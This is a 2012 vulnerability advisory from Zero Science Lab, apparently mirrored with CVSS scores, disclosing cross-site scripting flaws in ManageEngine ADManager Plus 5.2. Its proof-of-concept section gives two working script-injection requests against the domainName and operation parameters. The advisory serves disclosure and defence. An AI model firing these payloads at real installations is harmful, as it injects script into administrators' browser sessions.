Gjoko KrsticZSL-2012-5070ManageEngine ADManager Plus 5.2 Multiple XSS Vulnerabilities
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
AI Score
Confidence
High
EPSS
Percentile
76.0%
Title: ManageEngine ADManager Plus 5.2 Multiple XSS Vulnerabilities
Advisory ID: ZSL-2012-5070
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 07.02.2012
Summary
ADManager Plus is a simple, easy-to-use Windows Active Directory Management and Reporting Solution that helps AD Administrators and Help Desk Technicians with their day-to-day activities.
Description
ADManager Plus suffers from multiple XSS vulnerabilities when parsing user input to the ‘domainName’ parameter in the ‘/jsp/AddDC.jsp’ script via GET method and ‘operation’ parameter in the ‘/DomainConfig.do’ script via POST method. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session.
Vendor
Zoho Corporation Pvt. Ltd. - <http://www.manageengine.com>
Affected Version
5.2 (Build 5210)
Tested On
Microsoft Windows XP Professional SP3 (EN)
Apache-Coyote/1.1
Vendor Status
[07.02.2012] Vendor has knowledge about the issue, developing patch.
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <http://secunia.com/advisories/47887/>
[2] <http://cxsecurity.com/issue/WLB-2012020063>
[3] <http://www.securityfocus.com/bid/51893>
[4] <http://packetstormsecurity.org/files/109528>
[5] <http://www.osvdb.org/show/osvdb/78901>
[6] <http://www.osvdb.org/show/osvdb/78902>
[7] <http://xforce.iss.net/xforce/xfdb/73039>
[8] <https://vulners.com/cve/CVE-2012-1049>
Changelog
[07.02.2012] - Initial release
[08.02.2012] - Added reference [4], [5] and [6]
[09.02.2012] - Added reference [7]
[17.02.2012] - Added reference [8]
Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>ManageEngine ADManager Plus 5.2 Multiple XSS Vulnerabilities
Vendor: Zoho Corporation Pvt. Ltd.
Product web page: http://www.manageengine.com
Affected version: 5.2
Summary: ADManager Plus is a simple, easy-to-use Windows
Active Directory Management and Reporting Solution that
helps AD Administrators and Help Desk Technicians with
their day-to-day activities.
Desc: ADManager Plus suffers from multiple XSS vulnerabilities
when parsing user input to the 'domainName' parameter in the
'/jsp/AddDC.jsp' script via GET method and 'operation' parameter
in the '/DomainConfig.do' script via POST method. Attackers can
exploit these weaknesses to execute arbitrary HTML and script
code in a user's browser session.
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2012-5070
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5070.php
06.02.2012
---
#1
- GET http://localhost:8080/jsp/AddDC.jsp?domainName="><script>alert('zsl')</script> HTTP/1.1
#2
- POST http://localhost:8080/DomainConfig.do?methodToCall=save HTTP/1.1
- DOMAIN_NAME=test&DOMAIN_CONTROLLER_NAME=testsrv&save=Add&operation="><script>alert('zsl')</script>&reset=
</p></body></html>Related
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
AI Score
Confidence
High
EPSS
Percentile
76.0%